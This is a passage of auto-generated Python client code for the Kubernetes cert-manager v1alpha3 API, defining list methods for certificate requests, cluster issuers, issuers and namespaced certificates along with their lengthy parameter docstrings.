query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/certificaterequests', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequestList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_cluster_issuer(self, **kwargs): # noqa: E501
"""list_cluster_issuer # noqa: E501
list objects of kind ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cluster_issuer(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuerList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_cluster_issuer_with_http_info(**kwargs) # noqa: E501
def list_cluster_issuer_with_http_info(self, **kwargs): # noqa: E501
"""list_cluster_issuer # noqa: E501
list objects of kind ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cluster_issuer_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuerList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'pretty',
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuerList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_issuer_for_all_namespaces(self, **kwargs): # noqa: E501
"""list_issuer_for_all_namespaces # noqa: E501
list objects of kind Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_issuer_for_all_namespaces(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3IssuerList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_issuer_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
def list_issuer_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""list_issuer_for_all_namespaces # noqa: E501
list objects of kind Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_issuer_for_all_namespaces_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3IssuerList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'pretty',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_issuer_for_all_namespaces" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/issuers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3IssuerList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_namespaced_certificate(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_certificate # noqa: E501
list objects of kind Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_certificate(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_namespaced_certificate_with_http_info(namespace, **kwargs) # noqa: E501
def list_namespaced_certificate_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_certificate # noqa: E501
list objects of kind Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_certificate_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `list_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateList', # noqa: E501
auth_settings=auth_settings,
